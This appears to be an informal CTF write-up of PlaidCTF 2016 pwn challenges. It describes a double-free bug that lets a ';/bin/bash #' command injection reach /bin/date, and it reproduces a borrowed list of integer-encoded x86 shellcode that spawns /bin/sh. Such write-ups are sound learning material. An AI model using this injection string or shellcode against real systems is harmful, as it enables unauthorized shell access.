-
First we have to know we can use multi env, In binary they check debug bit and result is differ with that flag
-
Also when we try to quit program with option 5, free function is occured first and then ask user to quit really, we can occur
DFB(Double Free Bug) to get flag. -
At last when this program calculates number to unix time, this program use
/bin/date -d @time formattime and format is user input. -
If we can input
';/bin/bash #\at format place we can get shell, however we can only input%aAbBcCdDeFgGhHIjklmNnNpPrRsStTuUVwWxXyYzZ:-_/0^#
these characters so we can't input it directly. We have to use DFB here. -
Format: %c strdup(0x7fffaec863f8) = 0x251d420 3 Time zone: hello strdup(0x7fffaec863f8) = 0x251d4405 5 free(0x251d420) free(0x251d440) Are you sure you want to exit (y/N)? n 3 Time zone: hello strdup(0x7fffaec863f8) = 0x251d440 3 Time zone: hello strdup(0x7fffaec863f8) = 0x251d420 Time zone set. 4 Your formatted time is: Running command: /bin/date -d @0 +'hello' hello
-
Like that method. We changed format from %c to hello with out use first option.
-
We can use it to insert
';/bin/bash #\to formatter because Time zone input doesn't check any characters -
Attack file is at here[https://github.com/parksjin01/ctf/blob/master/2016/Plaid/Unix_Time_Format.py]
- Uhmm... I think it's too difficult I can't understand the answer.
- I'll just upload attack file, other people is made
- It's here[https://github.com/parksjin01/ctf/blob/master/2016/Plaid/butterfly.py]
- binary is tiny easy and it's easy to reverse. However I think it's hard to input shellcode in buffer.
- When we input decimal to program it divides that number with 1337.0 and buffer save that floating number sequentially.
- If I can make that value as same as shellcode than I can easily pwn it because there are also call instruction in main.
Only we have to do is input shellcode in buffer but I think it's really hard. So I googled it. - This good hacker[https://duksctf.github.io/PCTF2016-fixedpoint/] says this is proper payload for this problem
payload = [
'17018517', # mov ebx, esp ~> 89e3
'16493296', # xor eax, eax; inc eax ~> 31c040
'16963939', # inc eax; inc eax ~> 4040
'16963939', # inc eax; inc eax ~> 4040
'16963939', # inc eax; inc eax ~> 4040
'16963939', # inc eax; inc eax ~> 4040
'16963939', # inc eax; inc eax ~> 4040
'17009712', # xor ecx, ecx ~> 31c9
'17012720', # xor edx, edx ~> 31d2
'14975661', # /
'16965949', # inc ebx
'19339629', # b
'16965949', # inc ebx
'19938605', # i
'16965949', # inc ebx
'20366445', # n
'16965949', # inc ebx
'14975661', # /
'16965949', # inc ebx
'20794285', # s
'16965949', # inc ebx
'19853037', # h
'16965949', # inc ebx
'10953965', # \0
'16965949', # inc ebx
'16967631', # dec ebx; dec ebx;
'16967631', # dec ebx; dec ebx;
'16967631', # dec ebx; dec ebx;
'16967631', # dec ebx; dec ebx;
'17071084', # int 0x80
]
- He used
inc esias a nop sled instead ofnopand I think it's brilliant. - Despite of unsolved problem, I found useful tool to calculate floating to bianry[https://www.h-schmidt.net/FloatConverter/IEEE754.html]